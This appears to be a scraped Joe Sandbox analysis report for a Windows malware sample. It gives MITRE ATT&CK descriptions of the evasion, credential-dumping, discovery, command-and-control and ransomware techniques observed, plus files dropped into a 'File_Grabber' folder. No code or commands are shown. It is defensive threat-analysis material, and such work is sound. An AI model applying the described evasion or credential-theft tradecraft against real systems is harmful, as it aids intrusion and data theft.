Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
Tactics:	Lateral Movement
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CwQQqCmqkY.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\0.1.filtertrie.intermediate.txt

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\0.2.filtertrie.intermediate.txt

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\1-7FeatureCache.txt

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\AlternateServices.txt

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\Latest.dat

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\ProcessMAU[1].txt

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\Rdr[1].txt

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\ReportOwner[1].txt

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\SiteSecurityServiceState.txt

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\System_info.txt

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\hub-signature.txt

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\iconcache_1280.db

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\iconcache_1920.db

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\iconcache_2560.db

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\iconcache_768.db

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\iconcache_96.db

Windows Analysis Report
CwQQqCmqkY.exe

Function 00007FF7F132DDD8 Relevance: 63.2, APIs: 20, Strings: 16, Instructions: 150
fileCOMMON

Function 00007FF7F132FA1C Relevance: 37.1, APIs: 13, Strings: 8, Instructions: 380
COMMON

Function 00007FF7F12B3E20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 152
libraryloadernetworkCOMMON

Function 00007FF7F1330138 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 310
fileCOMMON

Function 00007FF7F129D690 Relevance: 15.4, APIs: 10, Instructions: 364
COMMON

Function 00007FF7F132773C Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 335
timeCOMMONLIBRARYCODE

Function 00007FF7F1311ED0 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre